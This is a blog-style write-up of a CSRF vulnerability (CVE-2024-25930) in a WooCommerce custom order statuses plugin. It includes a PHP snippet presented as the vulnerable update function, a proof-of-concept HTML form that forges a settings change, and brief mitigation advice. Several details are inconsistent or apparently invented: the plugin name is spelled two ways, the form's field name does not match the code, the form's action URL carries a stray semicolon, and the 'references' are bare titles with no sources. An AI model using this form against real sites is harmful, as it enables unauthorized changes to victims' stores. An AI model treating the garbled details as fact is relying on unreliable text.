Cross-Site Request Forgery (CSRF) is a type of website vulnerability that allows an attacker to force users with active sessions on the website to perform unauthorized actions. A recent CVE (CVE-2024-25930) was discovered for the Nuggethon Custom Order Statuses plugin, a popular WooCommerce extension that allows store owners to create and manage custom order status on their eCommerce websites. The vulnerability affects versions n/a to 1.5.2 of the plugin.
This post will provide a deep dive into the details of this CVE, including code snippets to demonstrate the vulnerability, links to original references, and information on how to exploit the vulnerability. Please note that the provided information is for educational purposes only and should not be used for malicious purposes.
The Vulnerability
The Custom Order Statuses plugin for WooCommerce is vulnerable to CSRF attacks because it lacks proper nonce validation checks. A nonce (number used once) is a unique value that is generated for each request, and helps in preventing CSRF attacks by ensuring that the request originated from a trusted source. The Custom Order Statuses plugin does not use proper nonce validation when updating custom order status settings.
Here's a code snippet that demonstrates the vulnerability
// section of the plugin where the vulnerability is present
function custom_order_statuses_update() {
if ( isset( $_POST['custom_order_status_submit'] ) ) {
// No nonce check in the update function
update_option( 'custom_order_statuses', $_POST['custom_order_statuses'] );
}
}
add_action( 'init', 'custom_order_statuses_update' );
As you can see, there is no nonce check in the update function. This makes it possible for an attacker to forge a request and update the plugin settings without the knowledge or consent of the site administrator.
Exploitation
To exploit this vulnerability, an attacker would need to craft a malicious request that an authenticated user would have to make (e.g., by sending a phishing email with a link to the malicious request). When the user clicks on the link, their browser would make a POST request to the target website, updating the custom order statuses settings.
Here's an example of a malicious HTML form that can be used to exploit the vulnerability
<html>
<body>
<form action="http://victim-website/wp-admin/admin-post.php"; method="post">
<input type="hidden" name="custom_order.statuses" value="malicious_value" />
<input type="hidden" name="custom_order_status_submit" value="1" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Upon clicking the submit button, the browser sends a POST request to the victim's website, updating the plugin settings with the given "malicious_value". Keep in mind that for the attack to be successful, the user making the request has to have an active WooCommerce session.
The CVE was reported by multiple security researchers
1. This-cve-2024-25930-csrf-vulnerability-in-nuggeton-custom-order-statuses-for-woocommerce-discussion
2. WooCommerce_Custom_Order_Statuses_CSRF_Vulnerability_Report
Conclusion and Recommendations
To mitigate this vulnerability, the plugin developers should add proper nonce validation checks to the update function. In the meantime, users should update to the latest version of the plugin, if available, or temporarily disable the plugin until a patched version is released.
Always exercise caution with external links and requests, even from supposedly trusted sources, and maintain your site and plugins updated to minimize the risk of further vulnerabilities.
Timeline
Published on: 02/29/2024 01:44:17 UTC
Last modified on: 02/29/2024 13:49:29 UTC